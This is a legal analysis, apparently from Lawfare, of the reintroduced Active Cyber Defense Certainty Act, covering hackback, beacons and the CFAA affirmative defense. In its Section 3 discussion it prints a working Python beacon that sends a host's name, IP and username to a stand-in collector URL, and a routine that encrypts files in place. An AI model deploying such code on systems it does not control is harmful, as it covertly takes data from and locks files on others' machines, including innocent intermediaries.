
Hackback Is Back: Assessing the Active Cyber Defense Certainty Act

Robert Chesney
Friday, June 14, 2019, 5:31 PM



The “hackback” debate has been with us for many years. It boils down to this: Private-sector victims of hacking in some instances might wish to engage in self-defense outside their own networks (that is, doing some hacking of their own in order to terminate an attack, identify the attacker, destroy stolen data, etc.) but for the prospect that they then would face criminal (and possibly civil) liability under 18 USC § 1030 (the Computer Fraud and Abuse Act, or CFAA). A tricky question of policy therefore arises: Should the CFAA be pruned to facilitate hackback under certain conditions? On one hand, this might produce significant benefits in terms of reducing harm to victims and deterring some intrusions. On the other hand, risks involving mistaken attribution, unintended collateral harms and dangerous escalation abound. It’s small wonder the hackback topic has spawned so much interesting debate (see here and here for examples).

It also has spawned specific legislative proposals. Rep. Tom Graves (R.-Ga.) made a splash in 2017 when he introduced H.R. 4036, a bipartisan bill memorably titled the Active Cyber Defense Certainty Act—that is, the ACDC Act. The bill excited a great deal of commentary, but it never emerged from committee.

Well, the ACDC Act is back (and, yes, I feel duty bound to say that it is Back in Black, that the bill addresses Dirty Deeds, and that critics fear it puts us on a Highway to Hell). The new bill, jointly sponsored by Graves and Rep. Josh Gottheimer (D.-N.J.), is here.

Here’s a section-by-section analysis:

Section 1: Short Title

Nothing to see here.

Section 2: Congressional Findings

Mostly what you would expect, but there are some interesting nuggets here, including a suggestion that the Department of Justice should try to generate a “protocol for entities who are engaged in active cyber defense in the dark web so that these defenders can return private property such as intellectual property and financial records gathered inadvertently.”

Now, on to the substantive provisions.

Section 3: Exceptions for the Use of Attributional Technology

This section is meant to facilitate the use of beacons. “Beacon” can mean various things, but the basic idea is simple: A potential victim includes code in a file on their own system, and in the event someone copies and exports the code, it will not only attempt to phone home to the victim but, in doing so, will also convey some amount of forensic detail regarding its current location. Think of it like a bank that sticks a GPS tracker, and maybe also a camera or recording device, in a bag of cash that might get stolen from the bank vault.
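To make the mechanics a bit more concrete, here is a minimal, purely illustrative sketch (in Python) of the kind of phone-home logic a beacon might carry inside a seeded file. Everything specific in it is an assumption for illustration only: the collector URL, the field names, and the particular data collected (chosen to roughly track the bill’s “locational or attributional data” language). Real beaconing tools are more sophisticated, and nothing here is drawn from the bill itself.

# Illustrative sketch only: a beacon that tries to phone home with basic
# locational/attributional data from whatever system the seeded file lands on.
# The collector URL and field names are hypothetical.
import getpass
import json
import platform
import socket
from datetime import datetime, timezone
from urllib import request

COLLECTOR_URL = "https://defender.example.com/beacon"  # hypothetical endpoint


def gather_attributional_data() -> dict:
    """Collect the sort of forensic detail the bill describes: time stamps,
    identifiers such as user names and IP addresses, and so on."""
    try:
        local_ip = socket.gethostbyname(socket.gethostname())
    except OSError:
        local_ip = "unknown"
    return {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "hostname": socket.gethostname(),
        "local_ip": local_ip,
        "username": getpass.getuser(),
        "platform": platform.platform(),
    }


def phone_home() -> None:
    """Report back to the defender's collector. Note that the beacon only
    observes and transmits; it does not alter or destroy anything on the
    host system, consistent with the conditions listed below."""
    payload = json.dumps(gather_attributional_data()).encode("utf-8")
    req = request.Request(
        COLLECTOR_URL,
        data=payload,
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        request.urlopen(req, timeout=5)
    except OSError:
        pass  # a beacon that cannot reach home simply stays quiet


if __name__ == "__main__":
    phone_home()

Even something this simple illustrates why the CFAA question arises: the code executes on, and transmits data from, a machine the defender does not own or control.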

It is not entirely clear that use of beacons in this scenario actually violates the CFAA, but many people have long feared that it might, and this has deterred reliance on that otherwise-smart defensive technique. In 2015, Congress flirted with a fix in the “defensive measures” sections of the Cybersecurity Information Sharing Act (CISA). The language of CISA was not nearly clear enough to resolve the uncertainty about the CFAA’s applicability to beacons, though, and that brings us to Section 3 of the ACDC Act.

This section would make clear that the CFAA does not apply to a beacon scenario when these conditions are met. The beacon:

1) Must elicit “locational or attributional data” (with attributional data defined broadly to mean “log files, text strings, time stamps, malware samples, identifiers such as user names and Internet Protocol addresses and metadata or other digital artifacts gathered through forensic analysis”).

2) Must originate within the defender’s system.

3) Must not destroy data or impair essential functionality of the attacker’s system.

4) Must not result in a backdoor such that the defender now has active access (the phrase they use is “intrusive access”).

Note: This arguably leaves space for a “beacon+” approach, in which the code in question does not just elicit and transmit the forensic information but also takes further defensive steps of a nondestructive nature such as locking up stolen data (that is, encrypting it while leaving it in place) or even doing the same to other data on the attacker’s system (which might be data stolen from others, or the attacker’s own data). That sort of thing does not seem to be the aim of this provision, and one can certainly argue that it would be beyond scope. Still, if not meant to be greenlighted, then it would probably be best to be clearer that such steps are not covered in this section.
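For what it is worth, the “locking up stolen data” idea is technically simple. Here is a minimal sketch, again in Python and again purely hypothetical: it assumes the defender’s code (the “beacon+”) is already executing where the stolen file landed and that the third-party cryptography package is available, neither of which the bill addresses.

# Illustrative sketch only: "locking up" a file by encrypting it in place,
# i.e., rendering it unreadable without deleting it. The file name is a
# hypothetical stand-in for exfiltrated data.
from pathlib import Path

from cryptography.fernet import Fernet


def lock_in_place(path: Path, key: bytes) -> None:
    """Replace the file's contents with an encrypted version. The data still
    exists, but only the holder of the key can recover it."""
    path.write_bytes(Fernet(key).encrypt(path.read_bytes()))


def unlock_in_place(path: Path, key: bytes) -> None:
    """Reverse the operation, restoring the original contents."""
    path.write_bytes(Fernet(key).decrypt(path.read_bytes()))


if __name__ == "__main__":
    demo = Path("stolen_data_demo.txt")  # stand-in for a stolen file
    demo.write_text("sensitive contents")
    key = Fernet.generate_key()          # the defender retains the key
    lock_in_place(demo, key)
    assert demo.read_text() != "sensitive contents"
    unlock_in_place(demo, key)
    assert demo.read_text() == "sensitive contents"

Whether doing that to data sitting on someone else’s machine counts as “destroying” it, or as something short of destruction, is precisely the kind of line the bill would eventually have to draw.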

Might they be covered by some other section of the ACDC, though? Read on!

Section 4: Exclusion From Prosecution for Certain Computer Crimes for Those Taking Active Cyber Defense Measures

The beacon scenario above presumes that the victim will have planned ahead, hiding code in a to-be-stolen file that will then try to phone home. But not every victim will have taken that step, and even when they do it won’t always work. What if the victim instead (or in addition) wants or needs to try other means once an attack occurs? And, for that matter, what about taking steps to actually shut down or mitigate an in-progress attack? Well, simply put, sometimes the victim understandably would like to hack back—particularly if time is of the essence, and if it does not seem that government authorities will intervene effectively or at all.

As things currently stand, such steps would violate the CFAA, assuming they involve accessing the systems of others (the attacker’s system or intermediary systems through which the attacker is routing or staging things) without authorization. The point of Section 4 is to change this, subject to certain conditions.

Specifically, Section 4 would establish an affirmative defense to CFAA charges for actions that qualify as “active cyber defense measures” (I’ll abbreviate that as ACDMs). Obviously, then, the definition of that phrase is critical. Let’s have a look.

There are three major moving parts to the definition: a description of which systems are the proper objects of an ACDM response from a victim, a list of three proper purposes for ACDMs, and a list of seven forbidden actions. We’ll go through these in order.

Proper object for an ACDM: As an initial matter, note that an ACDM is defined with reference to actions on behalf of the victim that access “the computer of the attacker” without authorization. Certainly that’s the heart of the idea. But note that the “computer of the attacker” is a phrase that can be construed narrowly or broadly. If construed strictly, it might be thought to exclude systems that the attacker has exploited and made part of the attack chain but that do not actually belong to the attacker. Since the use of such intermediary systems, or chains of intermediaries, is commonplace, this is an important distinction. Later in the definition, as I note below, there is in fact a reference to ACDMs impacting an “intermediary computer,” and so it seems clear the drafters do intend for ACDMs to reach them. At any rate, it would be best to make that clear at the outset by referring to “the computer of the attacker as well as any ‘intermediary computer’ through which the attack was or is routed.”

Proper purposes for an ACDM: Let’s now assume we know which systems are included as proper objects for an ACDM. The victim’s actions will count as an ACDM only if intended to accomplish one of three things:

1) “[E]stablish attribution of criminal activity,” which then would be shared with law enforcement and other relevant government agencies.

2) “[D]isrupt continued unauthorized activity against the defender’s own network.”

3) “[M]onitor the behavior of an attacker to assist in developing future intrusion prevention or cyber defense techniques.”

The first two items on that list (attribution and disruption of ongoing attack) are about what one would expect to see here, and what they mean is relatively clear. The third one on the list is different, both in terms of clarity and especially in terms of its relationship to the immediate goal of protection in the face of an attack. Simply put, it is quite forward looking and, arguably, rather boundless in terms of what it might encompass from an information-collection perspective.

Forbidden actions for an ACDM: Now let’s assume we have both a proper object for the ACDM and the right sort of intent. The bill lists seven forbidden effects, plainly with the intent to address concerns that have been raised about the undesirable harms that might occur if ACDMs are encouraged through removal of the CFAA obstacle. The list includes:

1) Intentionally destroying someone else’s data (note that accidental destruction is okay in this view, as is intentional destruction of the victim’s own [stolen] data).

2) Recklessly causing physical injury or financial loss (with the financial loss apparently defined with reference to 18 USC § 1030(c)(4), which specifies a $5,000 threshold).

3) Creating a “threat to the public health or safety” (without reference to intent or foreseeability, and without definition of those terms).

4) Insofar as the ACDM impacts an “intermediary computer,” intentionally doing more than is needed to perform “reconnaissance” on that computer for attribution purposes (a limitation that is fine if the only permissible purpose of an ACDM is attribution but that might be too strict if another aim really is to enable the victim to stop an ongoing attack).

5) Intentionally taking action that “results in intrusive or remote access into an intermediary’s computer” (a condition that might be hard to square with the whole idea of using an ACDM to hack into the intermediary computer to begin with, though obviously the underlying spirit of this condition is simply to ensure that the hackback does not turn into something broader than necessary for the limited purposes noted above).

6) Intentionally disrupting someone’s internet access on a “persistent” basis if doing so produces actual damages of the kind described in the CFAA.

7) Taking action that “[i]mpacts” computers that handle national defense information, government computers in general, and computers used by or for government law enforcement and national defense/security purposes (so, attackers should be sure to try to route attacks through at least one such computer!).

Plenty to say about these situations, but I’ve tried to flag the key questions in the parentheticals above and won’t repeat those points now.

Section 5: Notification Requirement for the Use of ACDMs

Let’s now assume we have a victim who plans to use an otherwise-proper ACDM pursuant to Section 4. Section 5 imposes a procedural prerequisite: advance notice to the FBI National Cyber Investigative Joint Task Force (including an obligation to await confirmation from the task force that it received the notice). Section 5 specifies various things that must be included in the notice. Note: As Kristin Eichensehr observed about the original bill in the last Congress, looping in the government in this way opens the door to the argument that the private actor’s conduct at that point might be attributable to the U.S. government, for purposes of determining state responsibility for action that someone might claim violates international law.

So, what good might be served by such advance notifications? For starters, it means that a victim entity must proceed knowing that the FBI is aware something is afoot, which perhaps will have a useful chilling effect on unduly aggressive ideas. But more formally, as we see in the next section, it also invites the FBI to intervene before the ACDM is put into play.

Section 6: Voluntary Preemptive Review of ACDMs

This section requires the FBI to establish a two-year pilot project in which victims intending to engage in an ACDM can choose not just to give the required advance notice but also to ask the FBI (and other agencies) to weigh in on how the planned ACDM might be refined to ensure it stays within the boundaries described above, as well as to improve its technical efficacy. The bill leaves unclear what burdens this would place on the FBI from a resource and timing perspective, other than to say that the FBI decides how to prioritize its responses to such voluntary requests.

Notice that this falls short of stating that the Justice Department would give some kind of letter ruling ensuring that the victim entity will not face liability if it carries through with the ACDM, but it nonetheless would surely have a similar effect so long as the victim entity adheres to the notified parameters and any resulting advice.

Section 7: Annual Report on the Federal Government’s Progress in Deterring Cyber Fraud and Cyber-Enabled Crimes

At this point the bill pivots toward more general issues involving cyber crime, calling for the Department of Justice to consult with other agencies to produce an annual report with a variety of cyber crime and enforcement statistics. That said, the bill does call for the annual report to include the number of ACDM notifications in a given year plus a substantive evaluation of the ACDM system.

Section 8: Requirement for the Department of Justice to Update the Manual on the Prosecution of Cyber Crimes

The Justice Department’s computer crimes manual would have to be updated to reflect this bill (which I’m sure they’d be inclined to do anyway, but no harm in requiring it, I suppose). This section also would “encourage[]” the department to take steps to keep the public informed about specific “defensive techniques and cyber technology that can be used” without violating the CFAA; a good idea, but if not actually required then this probably won’t change too much for the department’s Computer Crime and Intellectual Property Section.

Section 9: Sunset

The statute includes a two-year sunset, which is smart, but notice that the sunset is framed in a funny (and arguably limiting) way: It refers only to the “exclusion from prosecution created by this Act” as opposed to the act as a whole or to, say, all of Sections 3 through 6. Why does that matter? It matters because, as you may have noticed if you read carefully, the Section 3 “beacon” rule is clearly an exclusion from prosecution under the CFAA, whereas the Section 4 ACDM rule is framed as the creation of an affirmative defense. I suspect the sunset is meant to cover both, but as currently written it might be construed to reach only Section 3 (the much-less controversial part of the ACDC Act). Easily fixed, of course.

Okay, I hope you found that helpful. And now, as a reward for those who read this far and have AC/DC music on the brain as a result, take a few moments to enjoy the simple but brilliant opening riff for Have a Drink on Me.


Robert (Bobby) Chesney is the Dean of the University of Texas School of Law, where he also holds the James A. Baker III Chair in the Rule of Law and World Affairs at UT. He is known internationally for his scholarship relating both to cybersecurity and national security. He is a co-founder of Lawfare, the nation’s leading online source for analysis of national security legal issues, and he co-hosts the popular show The National Security Law Podcast.
